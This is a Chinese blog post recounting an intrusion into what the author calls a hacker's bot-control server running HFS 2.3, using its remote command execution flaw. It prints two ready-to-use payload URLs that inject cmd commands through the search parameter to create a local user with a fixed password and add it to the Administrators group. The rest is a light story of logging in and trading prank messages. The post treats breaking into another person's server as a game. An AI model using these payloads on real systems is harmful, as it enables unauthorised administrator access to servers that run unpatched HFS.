HFS远程命令执行漏洞入侵抓鸡黑阔服务器

先来科普一下:

HFS是什么?

hfs网络文件服务器 2.3是专为个人用户所设计的HTTP档案系统,如果您觉得架设FTP Server太麻烦,那么这个软件可以提供您更方便的网络文件传输系统,下载后无须安装,只要解压缩后执行 hfs.exe,于「Virtual File System(虚拟档案系统)」窗格下按鼠标右键,即可新增/移除虚拟档案资料夹,或者直接将欲加入的档案拖曳至此窗口,便可架设完成个人HTTP网络文件服务器。


故事开始了。

今天尼古拉斯四哥在群里发来那么一个IP

HFS远程命令执行漏洞入侵抓鸡黑阔服务器

打开看了一下。是传说中的抓鸡神器.HFS,如下图所示:

HFS远程命令执行漏洞入侵抓鸡黑阔服务器

其实HFS有一个命令执行漏洞。

Payload:

http://127.0.0.1/?search==%{.exec|cmd /c net user DEF DEFHACKER123 /add.}
http://127.0.0.1/?search==%{.exec|cmd /c net localgroup Administrators DEF /add.}

执行后是这样的效果。

HFS远程命令执行漏洞入侵抓鸡黑阔服务器

成功登录!

HFS远程命令执行漏洞入侵抓鸡黑阔服务器

黑客的工具

HFS远程命令执行漏洞入侵抓鸡黑阔服务器

然后黑客给我发来了一个消息

HFS远程命令执行漏洞入侵抓鸡黑阔服务器

哈哈,是四哥发的,如果真是管理员早给关了我账户了。礼尚往来的我也给他发了一个。

四哥的恶作剧。

HFS远程命令执行漏洞入侵抓鸡黑阔服务器

我给后面悄悄加了一句。

HFS远程命令执行漏洞入侵抓鸡黑阔服务器

本想通过逆向把黑客的马场日穿。然而让四哥逆向弄,弄半天没弄好。改日续集吧。

记得擦屁股否则黑客的DDOS攻击可是很猛烈的。

 结束


上一篇:Kali学习笔记30:身份认证与命令执行漏洞


下一篇:[web安全原理]PHP命令执行漏洞基础